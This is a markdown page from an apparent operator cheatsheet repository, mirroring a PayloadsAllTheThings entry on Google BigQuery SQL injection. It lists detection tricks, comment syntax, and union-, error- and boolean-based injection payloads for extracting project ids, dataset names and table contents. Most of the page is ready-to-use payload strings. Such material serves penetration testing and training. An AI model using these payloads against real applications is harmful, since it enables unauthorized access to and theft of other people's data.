daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

bigquery-injection.md (3898B)


      1 ---
      2 title: "Google BigQuery SQL Injection"
      3 topic: "SQL Injection"
      4 topicSlug: "sql-injection"
      5 sourcePath: "SQL Injection/BigQuery Injection.md"
      6 sourceUrl: "https://github.com/swisskyrepo/PayloadsAllTheThings/blob/3ac27901c711/SQL%20Injection/BigQuery%20Injection.md"
      7 sha: "3ac27901c711"
      8 isReadme: false
      9 ---
     10 
     11 # Google BigQuery SQL Injection
     12 
     13 > Google BigQuery SQL Injection  is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.
     14 
     15 ## Summary
     16 
     17 * [Detection](#detection)
     18 * [BigQuery Comment](#bigquery-comment)
     19 * [BigQuery Union Based](#bigquery-union-based)
     20 * [BigQuery Error Based](#bigquery-error-based)
     21 * [BigQuery Boolean Based](#bigquery-boolean-based)
     22 * [BigQuery Time Based](#bigquery-time-based)
     23 * [References](#references)
     24 
     25 ## Detection
     26 
     27 * Use a classic single quote to trigger an error: `'`
     28 * Identify BigQuery using backtick notation: ```SELECT .... FROM `` AS ...```
     29 
     30 | SQL Query                                             | Description                                       |
     31 | ----------------------------------------------------- | ------------------------------------------------- |
     32 | `SELECT @@project_id`                                 | Gathering project id                              |
     33 | `SELECT schema_name FROM INFORMATION_SCHEMA.SCHEMATA` | Gathering all dataset names                       |
     34 | `select * from project_id.dataset_name.table_name`    | Gathering data from specific project id & dataset |
     35 
     36 ## BigQuery Comment
     37 
     38 | Type                       | Description     |
     39 | -------------------------- | --------------- |
     40 | `#`                        | Hash comment    |
     41 | `/* PostgreSQL Comment */` | C-style comment |
     42 
     43 ## BigQuery Union Based
     44 
     45 ```ps1
     46 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
     47 true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
     48 true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
     49 ' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM  (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#
     50 ```
     51 
     52 ## BigQuery Error Based
     53 
     54 | SQL Query                                                | Description      |
     55 | -------------------------------------------------------- | ---------------- |
     56 | `' OR if(1/(length((select('a')))-1)=1,true,false) OR '` | Division by zero |
     57 | `select CAST(@@project_id AS INT64)`                     | Casting          |
     58 
     59 ## BigQuery Boolean Based
     60 
     61 ```ps1
     62 ' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#
     63 ```
     64 
     65 ## BigQuery Time Based
     66 
     67 * Time based functions does not exist in the BigQuery syntax.
     68 
     69 ## References
     70 
     71 * [BigQuery SQL Injection Cheat Sheet - Ozgur Alp - February 14, 2022](https://web.archive.org/web/20260222133721/https://ozguralp.medium.com/bigquery-sql-injection-cheat-sheet-65ad70e11eac)
     72 * [BigQuery Documentation - Query Syntax - October 30, 2024](https://web.archive.org/web/20251109151650/https://cloud.google.com/bigquery/docs/reference/standard-sql/query-syntax)
     73 * [BigQuery Documentation - Functions and Operators - October 30, 2024](https://web.archive.org/web/20170524193028/https://cloud.google.com/bigquery/docs/reference/standard-sql/functions-and-operators)
     74 * [Akamai Web Application Firewall Bypass Journey: Exploiting “Google BigQuery” SQL Injection Vulnerability - Duc Nguyen - March 31, 2020](https://web.archive.org/web/20260225150843/https://hackemall.live/index.php/2020/03/31/akamai-web-application-firewall-bypass-journey-exploiting-google-bigquery-sql-injection-vulnerability/)